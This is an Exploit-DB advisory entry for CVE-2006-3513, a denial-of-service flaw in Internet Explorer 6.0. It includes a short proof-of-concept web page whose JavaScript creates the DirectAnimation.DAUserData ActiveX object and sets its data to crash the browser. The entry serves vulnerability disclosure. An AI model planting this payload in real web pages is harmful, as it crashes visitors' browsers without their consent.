Microsoft Internet Explorer 6.0 DirectAnimation.DAUserData Denial of Service Vulnerability

2006-07-08T00:00:00
ID EDB-ID:28196
Type exploitdb
Reporter hdm
Modified 2006-07-08T00:00:00

Description

Microsoft Internet Explorer 6.0 DirectAnimation.DAUserData Denial Of Service Vulnerability. CVE-2006-3513. Dos exploit for windows platform

                                        
                                            source: http://www.securityfocus.com/bid/18902/info

Microsoft Internet Explorer is prone to a denial-of-service vulnerability.

This issue is triggered when an attacker convinces a victim user to visit a malicious website that uses the 'DirectAnimation.DAUserData' object in a malicious manner.

Remote attackers may exploit this issue to crash Internet Explorer, effectively denying service to legitimate users.

// MoBB Demonstration
function Demo() {
	var a = new ActiveXObject('DirectAnimation.DAUserData');
	a.Data = 'Hello';
}

</script>

Clicking the button below may crash your browser!<br><br>
<input type='button' onClick='Demo()' value='Start Demo!'>